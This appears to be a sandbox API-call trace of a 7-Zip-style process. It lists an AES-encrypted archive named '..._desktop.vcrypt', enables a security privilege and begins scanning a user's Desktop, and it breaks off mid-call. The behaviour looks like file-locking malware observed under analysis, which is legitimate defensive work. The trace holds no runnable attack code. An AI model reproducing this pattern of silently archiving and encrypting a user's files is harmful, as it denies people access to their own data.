[0071.385] malloc (_Size=0x4) returned 0xb5fa80 [0071.385] free (_Block=0x0) [0071.385] free (_Block=0x0) [0071.385] malloc (_Size=0x1) returned 0xb5fad0 [0071.385] free (_Block=0xb5fad0) [0071.386] malloc (_Size=0x84) returned 0x782340 [0071.386] free (_Block=0x0) [0071.386] malloc (_Size=0x4) returned 0xb5fad0 [0071.386] free (_Block=0x0) [0071.386] malloc (_Size=0x4) returned 0xb5fa90 [0071.386] free (_Block=0x0) [0071.386] malloc (_Size=0x4) returned 0xb5fab0 [0071.386] free (_Block=0x0) [0071.386] malloc (_Size=0x4) returned 0xb5fac0 [0071.386] malloc (_Size=0xc8) returned 0x7823d0 [0071.386] malloc (_Size=0x1) returned 0xb5fb30 [0071.386] free (_Block=0x0) [0071.386] malloc (_Size=0x1) returned 0xb5fb40 [0071.386] free (_Block=0x0) [0071.386] malloc (_Size=0x88) returned 0x7824a0 [0071.386] malloc (_Size=0x4) returned 0xb5d7f8 [0071.386] free (_Block=0x0) [0071.386] free (_Block=0x0) [0071.386] malloc (_Size=0x4) returned 0x782548 [0071.387] free (_Block=0x0) [0071.387] malloc (_Size=0x4) returned 0x782558 [0071.387] free (_Block=0x0) [0071.387] malloc (_Size=0x4) returned 0x782568 [0071.387] free (_Block=0x0) [0071.387] malloc (_Size=0x4) returned 0x782578 [0071.387] free (_Block=0x0) [0071.387] malloc (_Size=0x8) returned 0x782588 [0071.387] malloc (_Size=0x4000) returned 0x782930 [0071.388] malloc (_Size=0x1080) returned 0x786938 [0071.388] free (_Block=0x0) [0071.388] malloc (_Size=0x100000) returned 0x9d0020 [0071.388] malloc (_Size=0x8) returned 0x782598 [0071.388] malloc (_Size=0x4) returned 0x7825a8 [0071.388] free (_Block=0x0) [0071.388] malloc (_Size=0x8) returned 0x7825b8 [0071.388] free (_Block=0x0) [0071.388] malloc (_Size=0x4) returned 0x7825c8 [0071.388] free (_Block=0x7825a8) [0071.388] free (_Block=0x782598) [0071.389] malloc (_Size=0x30) returned 0x7879c0 [0071.389] SetFilePointer (in: hFile=0x80, lDistanceToMove=2788128, lpDistanceToMoveHigh=0x5ae5b8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x5ae5b8*=0) returned 0x2a8b20 [0071.389] malloc (_Size=0x28) returned 0x787a10 [0071.389] malloc (_Size=0x4) returned 0x782598 [0071.389] malloc (_Size=0x4) returned 0x7825a8 [0071.389] free (_Block=0x0) [0071.389] malloc (_Size=0x4) returned 0x7825d8 [0071.389] malloc (_Size=0x4) returned 0x7825e8 [0071.389] malloc (_Size=0x4) returned 0x7825f8 [0071.389] free (_Block=0x0) [0071.389] malloc (_Size=0x4) returned 0x782608 [0071.389] malloc (_Size=0x4) returned 0x782618 [0071.389] free (_Block=0x0) [0071.389] free (_Block=0x0) [0071.389] malloc (_Size=0x4) returned 0x782628 [0071.390] free (_Block=0x0) [0071.390] malloc (_Size=0x4) returned 0x782638 [0071.390] ReadFile (in: hFile=0x80, lpBuffer=0x9d0020, nNumberOfBytesToRead=0x6b3, lpNumberOfBytesRead=0x5ae4a4, lpOverlapped=0x0 | out: lpBuffer=0x9d0020*, lpNumberOfBytesRead=0x5ae4a4*=0x6b3, lpOverlapped=0x0) returned 1 [0071.391] free (_Block=0x7825d8) [0071.391] free (_Block=0x7879c0) [0071.391] free (_Block=0x787a10) [0071.391] free (_Block=0x782598) [0071.391] free (_Block=0x7825a8) [0071.391] free (_Block=0xb5fc90) [0071.391] free (_Block=0xb5fa80) [0071.391] free (_Block=0xb5fc50) [0071.391] free (_Block=0xb5fca0) [0071.391] free (_Block=0x0) [0071.391] free (_Block=0xb5fc80) [0071.391] free (_Block=0xb5fc70) [0071.391] free (_Block=0x0) [0071.391] free (_Block=0xb5fc40) [0071.391] free (_Block=0x780dd8) [0071.392] free (_Block=0x7800c0) [0071.392] free (_Block=0x782608) [0071.392] free (_Block=0x782618) [0071.392] free (_Block=0x7825e8) [0071.392] free (_Block=0x7825f8) [0071.392] free (_Block=0x782638) [0071.392] free (_Block=0x782628) [0071.392] free (_Block=0x7825c8) [0071.392] free (_Block=0x7825b8) [0071.392] free (_Block=0x782930) [0071.392] free (_Block=0x786938) [0071.392] free (_Block=0x9d0020) [0071.392] free (_Block=0x7823d0) [0071.392] free (_Block=0x7824a0) [0071.392] free (_Block=0xb5d7f8) [0071.392] free (_Block=0x0) [0071.392] free (_Block=0xb5fb40) [0071.393] free (_Block=0xb5fb30) [0071.393] free (_Block=0xb5fac0) [0071.393] free (_Block=0xb5fab0) [0071.393] free (_Block=0xb5fa90) [0071.393] free (_Block=0x0) [0071.393] free (_Block=0xb5fad0) [0071.393] free (_Block=0x782340) [0071.393] free (_Block=0x782588) [0071.393] free (_Block=0x782578) [0071.393] free (_Block=0x782568) [0071.393] free (_Block=0x782558) [0071.393] free (_Block=0x0) [0071.393] free (_Block=0x782548) [0071.393] free (_Block=0x0) [0071.393] free (_Block=0x0) [0071.393] free (_Block=0xb5fc30) [0071.393] free (_Block=0xb5fbe0) [0071.393] free (_Block=0xb5f668) [0071.393] free (_Block=0xb5fbb0) [0071.393] free (_Block=0xb5fb50) [0071.394] free (_Block=0xb5fb90) [0071.394] free (_Block=0xb5fbd0) [0071.394] free (_Block=0xb5fbf0) [0071.394] free (_Block=0xb5fc20) [0071.394] free (_Block=0xb5fc10) [0071.394] free (_Block=0xb5fc00) [0071.394] free (_Block=0xb5f6b0) [0071.394] free (_Block=0x0) [0071.394] malloc (_Size=0x128) returned 0x782340 [0071.394] free (_Block=0x0) [0071.394] malloc (_Size=0x94) returned 0x782470 [0071.394] free (_Block=0x0) [0071.394] malloc (_Size=0x24) returned 0x787a10 [0071.394] free (_Block=0x0) [0071.394] malloc (_Size=0x94) returned 0x7881f8 [0071.394] free (_Block=0x0) [0071.394] malloc (_Size=0x94) returned 0x788298 [0071.394] malloc (_Size=0x8) returned 0xb5fc00 [0071.394] free (_Block=0x0) [0071.394] malloc (_Size=0x10) returned 0xb5f6b0 [0071.394] free (_Block=0xb5fc00) [0071.395] free (_Block=0x0) [0071.395] malloc (_Size=0x2) returned 0xb5fc00 [0071.395] free (_Block=0x0) [0071.395] malloc (_Size=0x2) returned 0xb5fc10 [0071.395] malloc (_Size=0x2f4) returned 0x788338 [0071.395] free (_Block=0xb5fc10) [0071.395] free (_Block=0xb5fc00) [0071.395] free (_Block=0x0) [0071.395] malloc (_Size=0x240) returned 0x788638 [0071.395] free (_Block=0x0) [0071.395] malloc (_Size=0x90) returned 0x788880 [0071.395] malloc (_Size=0x8) returned 0xb5fc00 [0071.395] free (_Block=0x0) [0071.395] malloc (_Size=0x10) returned 0xb5f668 [0071.395] free (_Block=0xb5fc00) [0071.396] malloc (_Size=0x18) returned 0x7800c0 [0071.396] free (_Block=0xb5f668) [0071.396] malloc (_Size=0x20) returned 0x780dd8 [0071.396] free (_Block=0x7800c0) [0071.396] malloc (_Size=0x30) returned 0x788918 [0071.396] free (_Block=0x780dd8) [0071.396] malloc (_Size=0x40) returned 0x788950 [0071.396] free (_Block=0x788918) [0071.396] malloc (_Size=0x58) returned 0x788998 [0071.396] free (_Block=0x788950) [0071.396] malloc (_Size=0x70) returned 0x788918 [0071.396] free (_Block=0x788998) [0071.396] malloc (_Size=0x90) returned 0x788998 [0071.396] free (_Block=0x788918) [0071.397] malloc (_Size=0xb8) returned 0x788a30 [0071.397] free (_Block=0x788998) [0071.397] malloc (_Size=0xe8) returned 0x788918 [0071.397] free (_Block=0x788a30) [0071.397] malloc (_Size=0x128) returned 0x788a08 [0071.397] free (_Block=0x788918) [0071.397] free (_Block=0x0) [0071.397] malloc (_Size=0x24) returned 0x787a40 [0071.397] free (_Block=0x0) [0071.397] malloc (_Size=0x24) returned 0x787a70 [0071.397] free (_Block=0x0) [0071.397] malloc (_Size=0x90) returned 0x788918 [0071.397] free (_Block=0x787a40) [0071.397] malloc (_Size=0x8) returned 0xb5fc00 [0071.397] free (_Block=0x0) [0071.397] malloc (_Size=0x10) returned 0xb5f668 [0071.398] free (_Block=0xb5fc00) [0071.398] malloc (_Size=0x18) returned 0x7800c0 [0071.398] free (_Block=0xb5f668) [0071.398] free (_Block=0x0) [0071.398] malloc (_Size=0x28) returned 0x787a40 [0071.398] malloc (_Size=0x20) returned 0x780dd8 [0071.398] free (_Block=0x7800c0) [0071.398] malloc (_Size=0x722) returned 0x782930 [0071.398] free (_Block=0x0) [0071.398] malloc (_Size=0xa4) returned 0x788b38 [0071.398] malloc (_Size=0x30) returned 0x7889b0 [0071.398] free (_Block=0x780dd8) [0071.398] free (_Block=0x0) [0071.398] malloc (_Size=0x28) returned 0x787aa0 [0071.398] free (_Block=0x0) [0071.398] malloc (_Size=0x140) returned 0x788be8 [0071.398] free (_Block=0x0) [0071.399] malloc (_Size=0x28) returned 0x787ad0 [0071.399] free (_Block=0x0) [0071.399] malloc (_Size=0xa0) returned 0x788d30 [0071.399] malloc (_Size=0x40) returned 0x788dd8 [0071.399] free (_Block=0x7889b0) [0071.399] free (_Block=0x0) [0071.399] malloc (_Size=0x280) returned 0x783060 [0071.399] free (_Block=0x0) [0071.399] free (_Block=0x0) [0071.399] free (_Block=0x787a40) [0071.399] free (_Block=0x0) [0071.399] malloc (_Size=0x90) returned 0x788e20 [0071.399] free (_Block=0x0) [0071.399] malloc (_Size=0xa0) returned 0x788eb8 [0071.399] free (_Block=0x788918) [0071.399] free (_Block=0x787a70) [0071.399] free (_Block=0x788a08) [0071.399] free (_Block=0x0) [0071.399] free (_Block=0x781538) [0071.399] free (_Block=0xb5fb60) [0071.399] free (_Block=0xb5fbc0) [0071.400] free (_Block=0xb52b00) [0071.400] malloc (_Size=0x38) returned 0x780dd8 [0071.400] malloc (_Size=0x8) returned 0xb5fbc0 [0071.400] free (_Block=0x0) [0071.400] malloc (_Size=0x10) returned 0xb5f668 [0071.400] free (_Block=0xb5fbc0) [0071.400] malloc (_Size=0x18) returned 0x7800c0 [0071.400] free (_Block=0xb5f668) [0071.400] malloc (_Size=0x20) returned 0xb52b00 [0071.401] free (_Block=0x7800c0) [0071.401] malloc (_Size=0x30) returned 0x788f60 [0071.401] free (_Block=0xb52b00) [0071.401] malloc (_Size=0x40) returned 0x788f98 [0071.401] free (_Block=0x788f60) [0071.401] malloc (_Size=0x58) returned 0x788918 [0071.401] free (_Block=0x788f98) [0071.402] free (_Block=0x780dd8) [0071.402] free (_Block=0xb5f698) [0071.402] free (_Block=0xb5f410) [0071.402] free (_Block=0x780c20) [0071.402] free (_Block=0xb5f6c8) [0071.402] free (_Block=0x7812d0) [0071.403] malloc (_Size=0x48) returned 0x7812d0 [0071.403] malloc (_Size=0x8) returned 0x780c20 [0071.403] malloc (_Size=0xe) returned 0xb5f6c8 [0071.403] free (_Block=0x780c20) [0071.403] malloc (_Size=0x3a) returned 0x788f60 [0071.403] malloc (_Size=0x3a) returned 0x788978 [0071.403] free (_Block=0x788f60) [0071.403] malloc (_Size=0x3a) returned 0x783300 [0071.403] free (_Block=0x788978) [0071.403] malloc (_Size=0x3a) returned 0x783348 [0071.403] free (_Block=0xb5fb70) [0071.403] free (_Block=0x783300) [0071.403] free (_Block=0xb5f6c8) [0071.403] free (_Block=0x7812d0) [0071.404] malloc (_Size=0xe0) returned 0x788978 [0071.404] malloc (_Size=0x2) returned 0xb5fb70 [0071.404] malloc (_Size=0x2) returned 0xb5fbc0 [0071.404] malloc (_Size=0x2) returned 0xb5fb60 [0071.404] malloc (_Size=0x2) returned 0xb5fc00 [0071.404] malloc (_Size=0x84) returned 0x788a60 [0071.404] malloc (_Size=0x84) returned 0x781538 [0071.404] malloc (_Size=0x3a) returned 0x783300 [0071.404] malloc (_Size=0x4) returned 0xb5fc10 [0071.404] free (_Block=0x0) [0071.404] free (_Block=0x783348) [0071.404] free (_Block=0x781100) [0071.404] free (_Block=0x7811e0) [0071.404] free (_Block=0x780c00) [0071.404] free (_Block=0x780c10) [0071.404] free (_Block=0x780bc0) [0071.404] free (_Block=0x780be0) [0071.404] free (_Block=0x781068) [0071.404] free (_Block=0x780fd8) [0071.404] free (_Block=0x0) [0071.404] free (_Block=0x0) [0071.404] free (_Block=0x0) [0071.404] free (_Block=0x780bf0) [0071.404] free (_Block=0x781190) [0071.405] free (_Block=0x7810b8) [0071.405] free (_Block=0x780f38) [0071.405] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.405] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.405] fputs (in: _Str="--\n", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.407] fputs (in: _Str="Path", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.408] fputs (in: _Str=" = ", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.409] malloc (_Size=0x84) returned 0x780f38 [0071.409] malloc (_Size=0x4) returned 0x780bf0 [0071.409] malloc (_Size=0x84) returned 0x780fc8 [0071.409] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", cchWideChar=65, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 65 [0071.409] malloc (_Size=0x42) returned 0x7812d0 [0071.409] free (_Block=0x780bf0) [0071.409] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", cchWideChar=65, lpMultiByteStr=0x7812d0, cbMultiByte=65, lpDefaultChar=0x5af148, lpUsedDefaultChar=0x5af134 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", lpUsedDefaultChar=0x5af134) returned 65 [0071.409] free (_Block=0x780fc8) [0071.409] fputs (in: _Str="C:\\Users\\5p5NrGJn0jS HALPmcxz\\5p5NrGJn0jS HALPmcxz_desktop.vcrypt", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.410] free (_Block=0x7812d0) [0071.410] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0071.411] free (_Block=0x780f38) [0071.411] fputs (in: _Str="Type", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.412] fputs (in: _Str=" = ", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.412] malloc (_Size=0x6) returned 0x780bf0 [0071.412] malloc (_Size=0x4) returned 0x780be0 [0071.412] malloc (_Size=0x6) returned 0x780bc0 [0071.412] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="7z", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0071.412] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="7z", cchWideChar=2, lpMultiByteStr=0x780be0, cbMultiByte=2, lpDefaultChar=0x5af148, lpUsedDefaultChar=0x5af134 | out: lpMultiByteStr="7z", lpUsedDefaultChar=0x5af134) returned 2 [0071.413] free (_Block=0x780bc0) [0071.413] fputs (in: _Str="7z", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.413] free (_Block=0x780be0) [0071.413] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0071.415] free (_Block=0x780bf0) [0071.415] malloc (_Size=0x8) returned 0x780bf0 [0071.415] malloc (_Size=0x10) returned 0xb5f6c8 [0071.415] free (_Block=0x780bf0) [0071.415] malloc (_Size=0x4) returned 0x780bf0 [0071.415] malloc (_Size=0x8) returned 0x780be0 [0071.415] malloc (_Size=0xe) returned 0xb5f410 [0071.415] free (_Block=0x780bf0) [0071.415] fputs (in: _Str="Physical Size", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.416] fputs (in: _Str=" = ", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.417] malloc (_Size=0x10) returned 0xb5f698 [0071.417] malloc (_Size=0x4) returned 0x780bf0 [0071.417] malloc (_Size=0x10) returned 0xb5f668 [0071.417] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="2789880", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0071.417] malloc (_Size=0x8) returned 0x780bc0 [0071.417] free (_Block=0x780bf0) [0071.417] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="2789880", cchWideChar=7, lpMultiByteStr=0x780bc0, cbMultiByte=7, lpDefaultChar=0x5af0d4, lpUsedDefaultChar=0x5af0c0 | out: lpMultiByteStr="2789880", lpUsedDefaultChar=0x5af0c0) returned 7 [0071.417] free (_Block=0xb5f668) [0071.417] fputs (in: _Str="2789880", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.418] free (_Block=0x780bc0) [0071.418] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0071.419] free (_Block=0xb5f698) [0071.419] free (_Block=0x780be0) [0071.419] free (_Block=0xb5f410) [0071.419] free (_Block=0xb5f6c8) [0071.419] malloc (_Size=0x8) returned 0x780be0 [0071.419] malloc (_Size=0xa) returned 0xb5f6c8 [0071.419] free (_Block=0x780be0) [0071.419] malloc (_Size=0x4) returned 0x780be0 [0071.419] malloc (_Size=0x8) returned 0x780bc0 [0071.420] malloc (_Size=0xd) returned 0xb5f410 [0071.420] free (_Block=0x780be0) [0071.420] fputs (in: _Str="Headers Size", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.420] fputs (in: _Str=" = ", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.421] malloc (_Size=0xa) returned 0xb5f698 [0071.421] malloc (_Size=0x4) returned 0x780be0 [0071.421] malloc (_Size=0xa) returned 0xb5f668 [0071.421] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="1784", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0071.421] malloc (_Size=0x5) returned 0x780bf0 [0071.421] free (_Block=0x780be0) [0071.421] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="1784", cchWideChar=4, lpMultiByteStr=0x780bf0, cbMultiByte=4, lpDefaultChar=0x5af0d4, lpUsedDefaultChar=0x5af0c0 | out: lpMultiByteStr="1784", lpUsedDefaultChar=0x5af0c0) returned 4 [0071.421] free (_Block=0xb5f668) [0071.422] fputs (in: _Str="1784", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.422] free (_Block=0x780bf0) [0071.422] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0071.424] free (_Block=0xb5f698) [0071.424] free (_Block=0x780bc0) [0071.424] free (_Block=0xb5f410) [0071.424] free (_Block=0xb5f6c8) [0071.424] malloc (_Size=0x4) returned 0x780bc0 [0071.424] malloc (_Size=0x4) returned 0x780bf0 [0071.424] malloc (_Size=0x5) returned 0x780be0 [0071.424] free (_Block=0x780bf0) [0071.424] malloc (_Size=0x10) returned 0xb5f6c8 [0071.424] free (_Block=0x780bc0) [0071.424] free (_Block=0x780be0) [0071.425] malloc (_Size=0x4) returned 0x780be0 [0071.425] malloc (_Size=0x6) returned 0x780bc0 [0071.425] free (_Block=0x780be0) [0071.425] free (_Block=0x780bc0) [0071.425] strlen (_Str="Copy 7zAES") returned 0xa [0071.425] free (_Block=0xb5f6c8) [0071.425] malloc (_Size=0x8) returned 0x780bc0 [0071.425] SysStringLen (param_1="Copy 7zAES") returned 0xa [0071.425] malloc (_Size=0x16) returned 0x7800c0 [0071.425] free (_Block=0x780bc0) [0071.425] malloc (_Size=0x4) returned 0x780bc0 [0071.425] malloc (_Size=0x8) returned 0x780be0 [0071.425] malloc (_Size=0x7) returned 0x780bf0 [0071.425] free (_Block=0x780bc0) [0071.425] fputs (in: _Str="Method", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.426] fputs (in: _Str=" = ", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.519] malloc (_Size=0x16) returned 0x7801c0 [0071.519] malloc (_Size=0x4) returned 0x780bc0 [0071.519] malloc (_Size=0x16) returned 0x780220 [0071.519] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Copy 7zAES", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0071.519] malloc (_Size=0xb) returned 0xb5f6c8 [0071.519] free (_Block=0x780bc0) [0071.519] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="Copy 7zAES", cchWideChar=10, lpMultiByteStr=0xb5f6c8, cbMultiByte=10, lpDefaultChar=0x5af0d4, lpUsedDefaultChar=0x5af0c0 | out: lpMultiByteStr="Copy 7zAES", lpUsedDefaultChar=0x5af0c0) returned 10 [0071.519] free (_Block=0x780220) [0071.519] fputs (in: _Str="Copy 7zAES", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.520] free (_Block=0xb5f6c8) [0071.520] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0071.577] free (_Block=0x7801c0) [0071.577] free (_Block=0x780be0) [0071.577] free (_Block=0x780bf0) [0071.577] free (_Block=0x7800c0) [0071.577] malloc (_Size=0x8) returned 0x780bf0 [0071.577] malloc (_Size=0x4) returned 0x780be0 [0071.577] malloc (_Size=0x8) returned 0x780bc0 [0071.577] malloc (_Size=0x6) returned 0x780c10 [0071.577] free (_Block=0x780be0) [0071.577] fputs (in: _Str="Solid", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.578] fputs (in: _Str=" = ", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.579] malloc (_Size=0x4) returned 0x780be0 [0071.579] malloc (_Size=0x4) returned 0x780c00 [0071.579] malloc (_Size=0x4) returned 0x780c20 [0071.579] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 1 [0071.579] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x780c00, cbMultiByte=1, lpDefaultChar=0x5af0d4, lpUsedDefaultChar=0x5af0c0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x5af0c0) returned 1 [0071.580] free (_Block=0x780c20) [0071.580] fputs (in: _Str="-", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.580] free (_Block=0x780c00) [0071.581] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0071.582] free (_Block=0x780be0) [0071.582] free (_Block=0x780bc0) [0071.582] free (_Block=0x780c10) [0071.582] free (_Block=0x780bf0) [0071.582] malloc (_Size=0x8) returned 0x780bf0 [0071.582] malloc (_Size=0x4) returned 0x780c10 [0071.582] malloc (_Size=0x8) returned 0x780bc0 [0071.583] malloc (_Size=0x7) returned 0x780be0 [0071.583] free (_Block=0x780c10) [0071.583] fputs (in: _Str="Blocks", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.584] fputs (in: _Str=" = ", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.585] malloc (_Size=0x6) returned 0x780c10 [0071.585] malloc (_Size=0x4) returned 0x780c00 [0071.585] malloc (_Size=0x6) returned 0x780c20 [0071.585] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="36", cchWideChar=2, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 2 [0071.585] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="36", cchWideChar=2, lpMultiByteStr=0x780c00, cbMultiByte=2, lpDefaultChar=0x5af0d4, lpUsedDefaultChar=0x5af0c0 | out: lpMultiByteStr="36", lpUsedDefaultChar=0x5af0c0) returned 2 [0071.585] free (_Block=0x780c20) [0071.585] fputs (in: _Str="36", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.586] free (_Block=0x780c00) [0071.586] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0071.588] free (_Block=0x780c10) [0071.588] free (_Block=0x780bc0) [0071.588] free (_Block=0x780be0) [0071.588] free (_Block=0x780bf0) [0071.588] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0071.589] free (_Block=0x780ea8) [0071.589] free (_Block=0x0) [0071.589] free (_Block=0xb528a8) [0071.589] free (_Block=0x780bb0) [0071.589] free (_Block=0x780d88) [0071.589] GetCurrentProcess () returned 0xffffffff [0071.589] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x5af220 | out: TokenHandle=0x5af220*=0xc4) returned 1 [0071.590] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeSecurityPrivilege", lpLuid=0x5af214 | out: lpLuid=0x5af214*(LowPart=0x8, HighPart=0)) returned 1 [0071.591] AdjustTokenPrivileges (in: TokenHandle=0xc4, DisableAllPrivileges=0, NewState=0x5af210*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0071.591] GetLastError () returned 0x0 [0071.591] CloseHandle (hObject=0xc4) returned 1 [0071.591] malloc (_Size=0x8) returned 0x780bb0 [0071.591] fputs (in: _Str="Scanning the drive:", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.592] fputc (in: _Ch=10, _File=0x77032920 | out: _File=0x77032920) returned 10 [0071.593] malloc (_Size=0x6) returned 0x780bf0 [0071.593] free (_Block=0x780a70) [0071.593] malloc (_Size=0x4) returned 0x780a70 [0071.593] free (_Block=0x0) [0071.593] malloc (_Size=0x4) returned 0x780be0 [0071.593] free (_Block=0x0) [0071.593] malloc (_Size=0xc) returned 0xb5f6c8 [0071.593] malloc (_Size=0x4e) returned 0x788f60 [0071.593] malloc (_Size=0x4) returned 0x780bc0 [0071.594] free (_Block=0x0) [0071.594] malloc (_Size=0x4e) returned 0x780d88 [0071.594] free (_Block=0x780a80) [0071.594] GetTickCount () returned 0x11494c1 [0071.594] strlen (_Str="0") returned 0x1 [0071.594] malloc (_Size=0x10) returned 0xb5f410 [0071.594] free (_Block=0x780a90) [0071.594] malloc (_Size=0x5) returned 0x780a90 [0071.594] free (_Block=0x780af0) [0071.594] malloc (_Size=0x4e) returned 0x780ea8 [0071.594] free (_Block=0x780ac0) [0071.594] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0071.594] malloc (_Size=0x27) returned 0x787a70 [0071.594] free (_Block=0x780ab0) [0071.594] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", cchWideChar=38, lpMultiByteStr=0x787a70, cbMultiByte=38, lpDefaultChar=0x5af090, lpUsedDefaultChar=0x5af07c | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpUsedDefaultChar=0x5af07c) returned 38 [0071.594] malloc (_Size=0x50) returned 0x780f00 [0071.594] free (_Block=0xb5f410) [0071.594] fputs (in: _Str=" 0M Scan C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.595] fflush (in: _File=0x77032920 | out: _File=0x77032920) returned 0 [0071.595] malloc (_Size=0x32) returned 0x788af0 [0071.595] free (_Block=0x780aa0) [0071.595] malloc (_Size=0x6) returned 0x780aa0 [0071.595] free (_Block=0x780ad0) [0071.595] malloc (_Size=0x4e) returned 0x780f58 [0071.595] free (_Block=0x780ae0) [0071.595] malloc (_Size=0x8) returned 0x780ae0 [0071.596] malloc (_Size=0x4e) returned 0x780fb0 [0071.596] free (_Block=0x780ae0) [0071.596] malloc (_Size=0x80) returned 0x781008 [0071.596] free (_Block=0x780fb0) [0071.596] malloc (_Size=0x8) returned 0x780ae0 [0071.596] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x5aee74 | out: lpFindFileData=0x5aee74*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x780d560, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x780d560, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x2, dwReserved1=0x7772ee18, cFileName=".", cAlternateFileName="")) returned 